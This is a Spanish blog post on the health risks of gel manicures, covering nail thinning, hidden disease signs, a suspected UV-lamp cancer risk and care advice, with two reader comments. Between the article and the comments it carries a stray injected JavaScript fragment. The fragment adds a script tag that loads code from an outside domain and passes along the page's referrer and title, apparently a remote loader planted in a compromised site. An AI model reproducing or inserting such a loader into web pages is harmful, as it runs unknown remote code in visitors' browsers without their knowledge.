Salud y belleza » Productos peligrosos, Salud

Los riesgos de la manicura de gel

2 Comentarios

Cada vez se usa menos la manicura con esmalte convencional y comienzan a verse más las uñas de manicura de gel, que son a menudo más bonitas y duran más (unas dos semanas), por lo que son semipermanentes.

Pero los beneficios de esta manicura de gel se quedan ahí porque la Academia Estadounidense de Dermatología ha reflejado los resultados de un estudio en el que se demuestra que la manicura de gel puede hacer que las uñas se vuelvan más finas, por lo que perderían brillo y se romperían más fácilmente.

riesgos-uñas-de-gel

Otro de los peligros de esta manicura es que impediría que se viese algún síntoma en las uñas que pueda reflejar alguna enfermedad, porque muchas enfermedades pueden diagnosticarse por las uñas.

La manicura de gel debilita las uñas, aunque no se sabe si lo que lo provoca son los químicos de la pintura o la acetona que hace falta para quitarla. Además, también sospechan que las lámparas ultravioletas que se usan para fijar la pintura podrían provocar cáncer de piel, aunque eso no se ha demostrado aún.

Para los expertos, usar la manicura de gel de forma ocasional no es preocupante, pero las mujeres que lo hagan constantemente deberían tener en cuenta los riesgos que corren al hacerlo.

Para evitar al máximo que las uñas salgan perjudicadas, los expertos recomiendan que se preste mayor atención a las uñas, dejar que vuelvan a crecer y que se reparen solas. Además, aconsejan que si se quiere usar la manicura semipermanente se haga solo de forma ocasional. Y para protegerse de las luces ultravioleta aconsejan aplicar protector solar sobre las manos antes de aplicarla.

Por otro lado, no se debe dejar que la persona que haga las uñas retire las cutículas, algo muy ocasional, porque esto reseca las uñas y favorece las infecciones.

Si en algún momento se llega a apreciar que la manicura de gel genera problemas en las uñas lo mejor es dejar de usarla y optar, como alternativa, por el esmalte tradicional. Además, siempre se aconseja hidratar las uñas varias veces al día.

¿Has tenido alguna vez problemas con la manicura de gel?

d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

2 Comments »

  • Chani said:

    Es cierto que queda muy bonito pero más bonitas son unas uñas sanas y cuidadas…

  • Melania said:

    Eso no hay problema, luego te das un par de semanas con cremas y eso y recuperan la salud las uñas.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.